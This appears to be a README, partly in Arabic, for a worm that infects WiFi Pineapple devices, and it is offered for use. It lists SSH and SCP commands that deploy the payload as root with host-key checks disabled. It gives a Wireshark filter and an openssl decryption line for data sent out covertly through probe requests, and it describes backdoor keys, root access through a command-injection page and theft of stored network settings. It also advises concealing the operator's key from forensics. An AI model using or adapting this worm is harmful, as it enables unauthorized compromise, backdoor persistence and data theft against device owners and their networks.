
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
ملاحظة: ستحتاج إلى جهاز مُهيأ أو استخدام metasploit-module لتفعيل ssh
فلتر Wireshark هو:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
اختياريًا، استخدم سكربت harvest.py كما يلي:
python harvest.py [monitor-iface]
| الملف | الغرض |
|---|---|
| tv | الفيروس نفسه. |
| tvbd | مفتاح الباب الخلفي "الرئيسي"، لا توزّع المفتاح الخاص. |
| tvd | مفتاح الإفصاح، يُستخدم لتهريب البيانات عبر طلبات الاستطلاع. |
| tospo_rsa | مفتاح الهوية الخاص، خاص بكل جهاز مصاب ويُستخدم كمفتاح نقل. |
| tospo_rsa.pub | مفتاح الهوية العام، يُنقل عبر صفحة حقن الأوامر للسماح للهوية الخاصة بتنفيذ إجراءات بصلاحية root على الجهاز البعيد. |
| w | خيارات تكوين لاسلكية مُرسلة، تُستخدم لاستعادة الاتصالات السابقة. |
| n | خيارات تكوين شبكة مُرسلة، تُستخدم لاستعادة الاتصالات السابقة. |
| ملاحظة: يتم نقل جميع الملفات التي تبدأ بـ 'tv' عند إصابة جهاز جديد. لا تُضف مفاتيح خاصة أو ما شابه ذلك بأسماء تبدأ بـ 'tv' وإلا سيتم كشف مفتاحك الخاص في التحليل الجنائي. |